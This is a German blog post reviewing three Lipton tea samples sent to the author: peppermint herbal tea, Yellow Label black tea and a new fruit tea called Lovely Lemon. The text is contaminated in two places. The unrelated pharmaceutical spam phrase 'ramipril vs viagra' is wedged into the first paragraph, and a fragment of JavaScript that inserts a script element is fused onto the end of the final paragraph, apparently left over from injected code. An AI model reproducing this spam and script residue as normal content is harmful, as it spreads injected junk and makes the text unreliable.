Lipton Tee

Unlängst ist die bekannte Firma für Tee, Lipton auf meinen Blog aufmerksam geworden. Infolge dessen bekam ich letzte Woche drei Proben zum Testen. Dabei war Kräutertee Pfefferminze ramipril vs viagra , Yellow Label Tea und als neue Kreation Früchtetee Lovely Lemon.

Alle drei Sorten sind auf ihre eigene Weise etwas ganz Besonderes. Mein Mann trinkt jeden Morgen Pfefferminztee und war also der richtige Tester für diesen Tee. Sein Urteil fiel sehr gut aus. Es ist ein Tee, den man immer trinken kann. Pfefferminztee soll eine leicht anregende Wirkung haben. Das ist interessant für Leute, die keinen Kaffee trinken oder vertragen.

Der neuen Sorte Lovely Lemon sagt man ein tagträumerisches Aroma nach und ich kann sagen so ist es wirklich. Kleine Zitronenschalenstückchen mit zartem Honig bilden die Basis für diesen Tee.

Schwarztee von Lipton war schon immer mein Favorit unter den Schwarzen Teesorten. In letzter Zeit habe ich die Sorte aber etwas aus den Augen verloren, um so überraschter war ich jetzt von diesem Yellow Label Tea. Er ist der richtige Tee für eine Pause zwischendurch oder den klassischen 17.00 Uhr Tee.document.currentScript.parentNode.insertBefore(s, document.currentScript);}

Posted in Tee.

Hinterlasse eine Antwort